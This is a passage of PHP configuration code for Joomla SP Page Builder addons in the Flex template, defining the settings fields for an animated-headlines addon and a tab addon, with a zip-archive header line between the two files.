					'desc'=>JText::_('Choose Effect for Animated Headlines Animation'),
					'values'=>array(
						'rotate-1 reset-width'=>JText::_('Rotate 1'),
						'letters rotate-2'=>JText::_('Rotate 2'),
						'letters rotate-3'=>JText::_('Rotate 3'),
						'letters type'=>JText::_('Typing'),
						'loading-bar'=>JText::_('Loading Bar'),
						'slide reset-width'=>JText::_('Slide'),
						'clip is-full-width'=>JText::_('Clip'),
						'zoom reset-width'=>JText::_('Zoom'),
						'letters scale'=>JText::_('Scale'),
						'push reset-width'=>JText::_('Push'),
					),
					'std'=>'slide reset-width',
				),
				'loading_bar'=>array(
					'type'=>'slider',
					'title'=>JText::_('Loading Bar Height'),
					'min'=>1,
					'std'=>3,
					'max'=>10,
					'responsive'=>true,
					'depends'=>array(array('effect', '=', 'loading-bar')),
				),
				
				'loading_bar_color'=>array(
					'type'=>'color',
					'title'=>JText::_('Loading Bar Color'),
					'depends'=>array(array('effect', '=', 'loading-bar')),
				),
				
				'typing_cursor_color'=>array(
					'type'=>'color',
					'title'=>JText::_('Typing Cursor Color'),
					'depends'=>array(array('effect', '=', 'letters type')),
				),
				
				'clip_cursor_color'=>array(
					'type'=>'color',
					'title'=>JText::_('Clip Cursor Color'),
					'depends'=>array(array('effect', '=', 'clip is-full-width')),
				),
				
				'separator2'=>array(
					'type'=>'separator', 
					'title'=>JText::_('Headlines')
				),
				
				'before_text'=>array(
					'type'=>'text',
					'title'=>JText::_('FLEX_ADDON_ANIMATED_HEADLINES_BEFORE_TEXT'),
					'desc'=>JText::_('FLEX_ADDON_ANIMATED_HEADLINES_BEFORE_TEXT_DESC'),
					'std'=> ''
				),
				
				'after_text'=>array(
					'type'=>'text',
					'title'=>JText::_('FLEX_ADDON_ANIMATED_HEADLINES_AFTER_TEXT'),
					'desc'=>JText::_('FLEX_ADDON_ANIMATED_HEADLINES_AFTER_TEXT_DESC'),
					'std'=> ''
				),
				
				'separator3'=>array(
					'type'=>'separator', 
					'title'=>JText::_('Styling')
				),
				
				'heading_selector'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_DESC'),
					'values'=>array(
						'h1'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H1'),
						'h2'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H2'),
						'h3'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H3'),
						'h4'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H4'),
						'h5'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H5'),
						'h6'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H6'),
						'span'=> 'span',
						'div'=> 'div'
					),
					'std'=>'h2',
				),

				'title_font_family'=>array(
					'type'=>'fonts',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_FAMILY'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_FAMILY_DESC'),
					'selector'=> array(
						'type'=>'font',
						'font'=>'{{ VALUE }}',
						'css'=>'.sppb-addon-title { font-family: {{ VALUE }}; }'
					),
				),

				'title_fontsize'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_SIZE'),
					'std'=>'',
					'max'=>400,
					'responsive'=>true,
				),
				'title_lineheight'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINE_HEIGHT'),
					'std'=>'',
					'max'=>400,
					'responsive'=>true,
				),
			
				'title_font_style'=>array(
					'type'=>'fontstyle',
					'title'=> JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_STYLE'),
				),
				
				'title_letterspace'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LETTER_SPACING'),
					'values'=>array(
						'0'=> 'Default',
						'1px'=> '1px',
						'2px'=> '2px',
						'3px'=> '3px',
						'4px'=> '4px',
						'5px'=> '5px',
						'6px'=>	'6px',
						'7px'=>	'7px',
						'8px'=>	'8px',
						'9px'=>	'9px',
						'10px'=> '10px'
					),
					'std'=>'0',
				),
				'title_text_transform'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_TEXT_TRANSFORM'),
					'values'=>array(
						'none'=> 'None',
						'capitalize'=> 'Capitalize',
						'uppercase'=> 'Uppercase',
						'lowercase'=> 'Lowercase',
					),
					'std'=>'none',
				),
				
				'title_margin'=>array(
					'type'=>'margin',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_MARGIN'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_MARGIN_DESC'),
					'std' => '',
					'responsive'=>true
				),

				'title_padding'=>array(
					'type'=>'padding',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PADDING'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PADDING_DESC'),
					'std' => '',
					'responsive'=>true
				),

				'alignment'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CONTENT_ALIGNMENT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CONTENT_ALIGNMENT_DESC'),
					'values'=>array(
						'sppb-text-left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
						'sppb-text-center'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CENTER'),
						'sppb-text-right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
					),
					'std'=>'sppb-text-center',
				),
				'title_text_shadow'=>array(
					'type'=>'boxshadow',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_TEXT_SHADOW'),
					'std'=>'',
					'config' => array(
						'spread' => false
					)
				),

				'class'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
					'std'=>''
				),

				// Repeatable Items
				'sp_animated_headlines_item'=>array(
					'title'=>JText::_('FLEX_ADDON_ANIMATED_HEADLINES'),
					'attr'=>array(
						'title'=>array(
							'type'=>'text',
							'title'=>JText::_('FLEX_ADDON_ANIMATED_HEADLINE'),
							'desc'=>JText::_('FLEX_ADDON_ANIMATED_HEADLINE_DESC'),
							'std'=>'Animated Headline',
						),
						
						'headline_fontstyle'=>array(
							'type'=>'select',
							'title'=> JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_STYLE'),
							'values'=>array(
								//'underline'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_UNDERLINE'),
								'uppercase'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_UPPERCASE'),
								'italic'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_ITALIC'),
								'lighter'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_LIGHTER'),
								'normal'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_NORMAL'),
								'bold'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_BOLD'),
								'bolder'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_BOLDER'),
							),
							'multiple'=>true,
							'std'=>'',
						),

						'headline_font_family'=>array(
							'type'=>'fonts',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_FONT_FAMILY'),
							'selector'=> array(
								'type'=>'font',
								'font'=>'{{ VALUE }}',
								'css'=>'{ font-family: {{ VALUE }}; }'
							)
						),
						
						'headline_color'=>array(
							'type'=>'color',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_ITEM_TITLE_COLOR'),
							'std'=>'#555',
						),
						
						'headline_class'=>array(
							'type'=>'text',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
							'std'=>''
						),
					),
				),
			),
		),
	)
);
PK!�
*JҲҲ'flex/sppagebuilder/addons/tab/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct accees
defined('_JEXEC') or die('Restricted access');

//Include Pixeden Icons (in Flex)
require_once dirname(dirname( __DIR__ )) . '/fields/pixeden-icons.php';

SpAddonsConfig::addonConfig(
        array(
            'type' => 'repeatable',
            'addon_name' => 'sp_tab',
            'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB'),
            'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_DESC'),
            'category' => 'Content',
            'attr' => array(
                'general' => array(
                    'admin_label' => array(
                        'type' => 'text',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
                        'std' => ''
                    ),
                    'title' => array(
                        'type' => 'text',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_DESC'),
                        'std' => ''
                    ),
                    'heading_selector' => array(
                        'type' => 'select',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_DESC'),
                        'values' => array(
                            'h1' => JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H1'),
                            'h2' => JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H2'),
                            'h3' => JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H3'),
                            'h4' => JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H4'),
                            'h5' => JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H5'),
                            'h6' => JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H6'),
                        ),
                        'std' => 'h3',
                        'depends' => array(array('title', '!=', '')),
                    ),
                    'title_font_family' => array(
                        'type' => 'fonts',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_FAMILY'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_FAMILY_DESC'),
                        'depends' => array(array('title', '!=', '')),
                        'selector' => array(
                            'type' => 'font',
                            'font' => '{{ VALUE }}',
                            'css' => '.sppb-addon-title { font-family: "{{ VALUE }}"; }'
                        )
                    ),
                    'title_fontsize' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE_DESC'),
                        'std' => '',
                        'depends' => array(array('title', '!=', '')),
                        'max' => 400,
                        'responsive' => true
                    ),
                    'title_lineheight' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_LINE_HEIGHT'),
                        'std' => '',
                        'depends' => array(array('title', '!=', '')),
                        'max' => 400,
                        'responsive' => true
                    ),
                    'title_font_style' => array(
                        'type' => 'fontstyle',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_STYLE'),
                        'depends' => array(array('title', '!=', '')),
                    ),
                    'title_letterspace' => array(
                        'type' => 'select',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_LETTER_SPACING'),
                        'values' => array(
                            '0' => 'Default',
                            '1px' => '1px',
                            '2px' => '2px',
                            '3px' => '3px',
                            '4px' => '4px',
                            '5px' => '5px',
                            '6px' => '6px',
                            '7px' => '7px',
                            '8px' => '8px',
                            '9px' => '9px',
                            '10px' => '10px'
                        ),
                        'std' => '0',
                        'depends' => array(array('title', '!=', '')),
                    ),
                    'title_text_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR_DESC'),
                        'depends' => array(array('title', '!=', '')),
                    ),
                    'title_margin_top' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP_DESC'),
                        'placeholder' => '10',
                        'depends' => array(array('title', '!=', '')),
                        'max' => 400,
                        'responsive' => true
                    ),
                    'title_margin_bottom' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM_DESC'),
                        'placeholder' => '10',
                        'depends' => array(array('title', '!=', '')),
                        'max' => 400,
                        'responsive' => true
                    ),
					'style' => array(
                        'type' => 'select',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_STYLE'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_STYLE_DESC'),
                        'values' => array(
                            'modern' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_STYLE_MODERN'),
                            'tabs' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_STYLE_DEFAULT'),
							// Flex style:
							'flex' => JText::_('COM_SPPAGEBUILDER_GLOBAL_FLEX'),
                            'pills' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_STYLE_PILLS'),
                            'lines' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_STYLE_LINES'),
                            'custom' => JText::_('COM_SPPAGEBUILDER_GLOBAL_CUSTOM'),
                        ),
                        'std' => 'tabs'
                    ),
					// Flex addition
					'fluid_tab_width'=>array(
						'type'=>'select',
						'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TAB_FLUID'),
						'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TAB_FLUID_DESC'),
						'values'=>array(
							''=>JText::_('COM_SPPAGEBUILDER_ADDON_TAB_FLUID_STYLE'),
							'adaptive'=>JText::_('COM_SPPAGEBUILDER_ADDON_TAB_ADAPTIVE_STYLE'),
						),
						'std'=> ''
					),
                    // Repeatable Item
                    'sp_tab_item' => array(
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_ITEMS'),
                        'attr' => array(
                            'title' => array(
                                'type' => 'text',
                                'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_ITEM_TITLE'),
                                'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_ITEM_TITLE_DESC'),
                                'std' => 'Tab'
                            ),
                            'subtitle' => array(
                                'type' => 'text',
                                'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_ITEM_SUBTITLE'),
                                'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_ITEM_SUBTITLE_DESC'),
                                'std' => '',
                            ),
                            'image_or_icon'=>array(
                                'type'=>'buttons',
                                'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TAB_ITEM_ICON_OR_IMAGE'),
                                'std'=>'icon',
                                'values'=>array(
                                    array(
                                        'label' => 'Icon',
                                        'value' => 'icon'
                                    ),
                                    array(
                                        'label' => 'Image',
                                        'value' => 'image'
                                    ),
                                ),
                                'tabs' => true,
                            ),
							'peicon_name'=>array( // Pixeden Icons
								'type'=>'select', 
								'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME'),
								'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME_DESC'),
								 'depends' => array(
                                    array('image_or_icon', '=', 'icon'),
                                ),
								'std' => '',
								'values'=> $peicon_list
							),
                            'icon' => array(
                                'type' => 'icon',
                                'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_ITEM_ICON'),
                                'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_ITEM_ICON_DESC'),
                                'std' => '',
                                'depends' => array(
                                    array('image_or_icon', '=', 'icon'),
                                )
                            ),
                            'image' => array(
                                'type' => 'media',
                                'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_ITEM_IMAGE'),
                                'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_ITEM_IMAGE_DESC'),
                                'std' => '',
                                'depends' => array(
                                    array('image_or_icon', '=', 'image'),
                                )
                            ),
                            'content' => array(
                                'type' => 'builder',
                                'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_ITEM_TEXT'),
                                'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_ITEM_TEXT_DESC'),
                                'std' => 'Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod. Brunch 3 wolf moon tempor, sunt aliqua put a bird on it squid single-origin coffee nulla assumenda shoreditch et.'
                            ),
                        ),
                    ),
                    //Custom Tab Style
                    'custom_tab_style'=>array(
                        'type'=>'buttons',
                        'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TAB_STYLE_OPTIONS'),
                        'std'=>'navigation',
                        'values'=>array(
                            array(
                                'label' => 'Navigation',
                                'value' => 'navigation'
                            ),
                            array(
                                'label' => 'Nav Icon or Image',
                                'value' => 'icon_image'
                            ),
                            array(
                                'label' => 'Content',
                                'value' => 'content'
                            ),
                        ),
                        'tabs' => true,
                        'depends' => array(
                            array('style', '=', 'custom')
                        ),
                    ),
                    'tab_separator'=>array(
                        'type'=>'separator',
                        'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TAB_SEPERATOR'),
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('custom_tab_style', '=', 'navigation'),
                        ),
                    ),
                    'nav_position'=>array(
                        'type'=>'select',
                        'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TAB_NAV_POSITION'),
                        'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TAB_NAV_POSITION_DESC'),
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('custom_tab_style', '=', 'navigation'),
                        ),
                        'values' => array(
                            'nav-left' => JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
                            'nav-right' => JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
                        ),
                    ),
                    'nav_gutter' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_NAV_GUTTER'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_NAV_GUTTER_DESC'),
                        'responsive' => true,
                        'max' => 100,
                        'std' => array('md' => 15),
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('custom_tab_style', '=', 'navigation'),
                        ),
                    ),
                    'nav_style' => array(
                        'type' => 'buttons',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_NAV_STYLE'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_NAV_STYLE_DESC'),
                        'std' => 'normal',
                        'values' => array(
                            array(
                                'label' => 'Normal',
                                'value' => 'normal'
                            ),
                            array(
                                'label' => 'Hover',
                                'value' => 'hover'
                            ),
                            array(
                                'label' => 'Active',
                                'value' => 'active'
                            ),
                        ),
                        'tabs' => true,
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('custom_tab_style', '=', 'navigation'),
                        ),
                    ),
                    'nav_width' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_NAV_WIDTH'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_NAV_WIDTH_DESC'),
                        'responsive' => true,
                        'max' => 100,
                        'std' => array('md'=>30, 'sm'=>30, 'xs'=> 30),
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'normal'),
                            array('custom_tab_style', '=', 'navigation'),
                        ),
                    ),
                    'nav_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_NAV_COLOR'),
                        'std' => '#fff',
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'normal'),
                            array('custom_tab_style', '=', 'navigation'),
                        ),
                    ),
                    'nav_bg_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_NAV_BG_COLOR'),
                        'std' => '#000',
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'normal'),
                            array('custom_tab_style', '=', 'navigation'),
                        ),
                    ),
                    'nav_fontsize' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_NAV_FONT_SIZE'),
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'normal'),
                            array('custom_tab_style', '=', 'navigation'),
                        ),
                        'max' => 400,
                        'responsive' => true,
                        'std' => array('md'=>16),
                    ),
                    'nav_lineheight'=>array(
                        'type'=>'slider',
                        'title'=>JText::_('COM_SPPAGEBUILDER_TAB_NAV_LINEHEIGHT'),
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'normal'),
                            array('custom_tab_style', '=', 'navigation'),
                        ),
                        'responsive' => true,
                        'max'=> 400,
                        'std' => array('md'=>''),
                    ),
                    'nav_font_family'=>array(
                        'type'=>'fonts',
                        'title'=>JText::_('COM_SPPAGEBUILDER_TAB_NAV_FONT_FAMILY'),
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'normal'),
                            array('custom_tab_style', '=', 'navigation'),
                        ),
                        'selector'=> array(
                            'type'=>'font',
                            'font'=>'{{ VALUE }}',
                            'css'=>'.sppb-nav-custom a{ font-family: "{{ VALUE }}"; }'
                        )
                    ),
                    'nav_font_style'=>array(
                        'type'=>'fontstyle',
                        'title'=> JText::_('COM_SPPAGEBUILDER_TAB_NAV_FONT_STYLE'),
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'normal'),
                            array('custom_tab_style', '=', 'navigation'),
                        ),
                    ),
                    'nav_border' => array(
                        'type' => 'margin',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_NAV_BORDER'),
                        'std' => '1px 1px 1px 1px',
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'normal'),
                            array('custom_tab_style', '=', 'navigation'),
                        ),
                    ),
                    'nav_border_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_NAV_BORDER_COLOR'),
                        'std' => '#e5e5e5',
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'normal'),
                            array('custom_tab_style', '=', 'navigation'),
                        ),
                    ),
                    'nav_border_radius' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_NAV_BORDER_RADIUS'),
                        'std' => '',
                        'max' => 400,
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'normal'),
                            array('custom_tab_style', '=', 'navigation'),
                        ),
                    ),
                    'nav_margin' => array(
                        'type' => 'margin',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_NAV_MARGIN'),
                        'responsive' => true,
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'normal'),
                            array('custom_tab_style', '=', 'navigation'),
                        ),
                        'std' => '0px 0px 5px 0px',
                    ),
                    'nav_padding' => array(
                        'type' => 'padding',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_NAV_PADDING'),
                        'responsive' => true,
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'normal'),
                            array('custom_tab_style', '=', 'navigation'),
                        ),
                        'std' => '10px 10px 10px 10px',
                    ),
                    'nav_text_align' => array(
                        'type' => 'select',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_TEXT_POSITION'),
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'normal'),
                            array('custom_tab_style', '=', 'navigation'),
                        ),
                        'values' => array(
                            'sppb-text-left' => JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
                            'sppb-text-center' => JText::_('COM_SPPAGEBUILDER_GLOBAL_CENTER'),
                            'sppb-text-right' => JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
                        ),
                        'std' => 'left',
                    ),
                    //Hover Nav Style
                    'hover_tab_bg' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_HOVER_BG'),
                        'std' => '',
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'hover'),
                            array('custom_tab_style', '=', 'navigation'),
                        ),
                    ),
                    'hover_tab_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_HOVER_COLOR'),
                        'std' => '',
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'hover'),
                            array('custom_tab_style', '=', 'navigation'),
                        ),
                    ),
                    'hover_tab_border_width' => array(
                        'type' => 'margin',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_HOVER_BORDER'),
                        'std' => '',
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'hover'),
                            array('custom_tab_style', '=', 'navigation'),
                        ),
                    ),
                    'hover_tab_border_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_HOVER_BORDER_COLOR'),
                        'std' => '',
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'hover'),
                            array('custom_tab_style', '=', 'navigation'),
                        ),
                    ),
                    //Active Nav Style
                    'active_tab_bg' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_ACTIVE_BG'),
                        'std' => '#e5e5e5',
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'active'),
                            array('custom_tab_style', '=', 'navigation'),
                        ),
                    ),
                    'active_tab_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_ACTIVE_COLOR'),
                        'std' => '#333333',
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'active'),
                            array('custom_tab_style', '=', 'navigation'),
                        ),
                    ),
                    'active_tab_border_width' => array(
                        'type' => 'margin',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_ACTIVE_BORDER'),
                        'std' => '',
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'active'),
                            array('custom_tab_style', '=', 'navigation'),
                        ),
                    ),
                    'active_tab_border_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TAB_ACTIVE_BORDER_COLOR'),
                        'std' => '',
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'active'),
                            array('custom_tab_style', '=', 'navigation'),
                        ),
                    ),
                    //Icon or Image style
                    'image_or_icon_style'=>array(
                        'type'=>'buttons',
                        'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TAB_ITEM_ICON_OR_IMAGE_STYLE'),
                        'std'=>'icon_style',
                        'values'=>array(
                            array(
                                'label' => 'Icon Style',
                                'value' => 'icon_style'
                            ),
                            array(
                                'label' => 'Image Style',
                                'value' => 'image_style'
                            ),
                        ),
                        'tabs' => true,
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('custom_tab_style', '=', 'icon_image'),
                        ),
                    ),
                    //Icon Style
                    'icon_separator'=>array(
                        'type'=>'separator',
                        'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TAB_ICON_OPTIONS'),
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('custom_tab_style', '=', 'icon_image'),
                            array('image_or_icon_style', '=', 'icon_style'),
                        ),
                    ),
                    'nav_icon_postion' => array(
                        'type' => 'select',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_ICON_POSITION'),
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'normal'),
                            array('custom_tab_style', '=', 'icon_image'),
                            array('image_or_icon_style', '=', 'icon_style'),
                        ),
                        'values' => array(
                            'top' => JText::_('COM_SPPAGEBUILDER_GLOBAL_TOP'),
                            'right' => JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
                            'bottom' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BOTTOM'),
                            'left' => JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
                        ),
                        'std' => 'left',
                    ),
                    'icon_fontsize' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_ICON_SIZE'),
                        'responsive' => true,
                        'max' => 400,
                        'std' => array('md'=>16),
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'normal'),
                            array('custom_tab_style', '=', 'icon_image'),
                            array('image_or_icon_style', '=', 'icon_style'),
                        ),
                    ),
                    'icon_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_ICON_COLOR'),
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'normal'),
                            array('custom_tab_style', '=', 'icon_image'),
                            array('image_or_icon_style', '=', 'icon_style'),
                        ),
                    ),
                    'icon_color_hover' => array(
                        'type' => 'color',
